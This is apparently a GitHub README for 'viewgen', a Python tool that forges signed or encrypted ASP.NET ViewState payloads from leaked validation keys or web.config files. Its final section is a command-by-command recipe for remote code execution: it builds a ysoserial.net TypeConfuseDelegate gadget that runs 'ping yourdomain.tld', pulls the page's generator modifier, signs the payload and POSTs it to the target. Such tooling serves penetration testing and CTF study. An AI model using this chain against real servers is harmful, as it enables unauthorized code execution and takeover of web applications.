
Primary LanguagePythonMIT LicenseMIT


ASP.NET ViewState Generator

viewgen is a ViewState tool capable of generating both signed and encrypted payloads with leaked validation keys or web.config files

Requirements: Python 3


pip3 install --upgrade -r requirements.txt or ./install.sh


$ viewstate -h
usage: viewgen [-h] [--webconfig WEBCONFIG] [-m MODIFIER] [-c COMMAND]
               [--decode] [--guess] [--check] [--vkey VKEY] [--valg VALG]
               [--dkey DKEY] [--dalg DALG] [-e]

viewgen is a ViewState tool capable of generating both signed and encrypted
payloads with leaked validation keys or web.config files

positional arguments:
  payload               ViewState payload (base 64 encoded)

optional arguments:
  -h, --help            show this help message and exit
  --webconfig WEBCONFIG
                        automatically load keys and algorithms from a
                        web.config file
  -m MODIFIER, --modifier MODIFIER
                        VIEWSTATEGENERATOR value
  -c COMMAND, --command COMMAND
                        Command to execute
  --decode              decode a ViewState payload
  --guess               guess signature and encryption mode for a given
  --check               check if modifier and keys are correct for a given
  --vkey VKEY           validation key
  --valg VALG           validation algorithm
  --dkey DKEY           decryption key
  --dalg DALG           decryption algorithm
  -e, --encrypted       ViewState is encrypted


$ viewgen --decode --check --webconfig web.config --modifier CA0B0334 "zUylqfbpWnWHwPqet3cH5Prypl94LtUPcoC7ujm9JJdLm8V7Ng4tlnGPEWUXly+CDxBWmtOit2HY314LI8ypNOJuaLdRfxUK7mGsgLDvZsMg/MXN31lcDsiAnPTYUYYcdEH27rT6taXzDWupmQjAjraDueY="
[+] ViewState
(('1628925133', (None, [3, (['enctype', 'multipart/form-data'], None)])), None)
[+] Signature
[+] Signature match

$ viewgen --webconfig web.config --modifier CA0B0334 "/wEPDwUKMTYyODkyNTEzMw9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRk"

$ viewgen --guess "/wEPDwUKMTYyODkyNTEzMw9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkuVmqYhhtcnJl6Nfet5ERqNHMADI="
[+] ViewState is not encrypted
[+] Signature algorithm: SHA1

$ viewgen --guess "zUylqfbpWnWHwPqet3cH5Prypl94LtUPcoC7ujm9JJdLm8V7Ng4tlnGPEWUXly+CDxBWmtOit2HY314LI8ypNOJuaLdRfxUK7mGsgLDvZsMg/MXN31lcDsiAnPTYUYYcdEH27rT6taXzDWupmQjAjraDueY="
[!] ViewState is encrypted
[+] Algorithm candidates:

Achieving Remote Code Execution

Leaking the web.config file or validation keys from ASP.NET apps results in RCE via ObjectStateFormatter deserialization if ViewStates are used.

You can use the built-in command option (ysoserial.net based) to generate a payload:

$ viewgen --webconfig web.config -m CA0B0334 -c "ping yourdomain.tld"

However, you can also generate it manually:

1 - Generate a payload with ysoserial.net:

> ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "ping yourdomain.tld"

2 - Grab a modifier (__VIEWSTATEGENERATOR value) from a given endpoint of the webapp

3 - Generate the signed/encrypted payload:

$ viewgen --webconfig web.config --modifier MODIFIER PAYLOAD

4 - Send a POST request with the generated ViewState to the same endpoint

5 - Profit 🎉🎉


CTF Writeups about this technique

Talks about this technique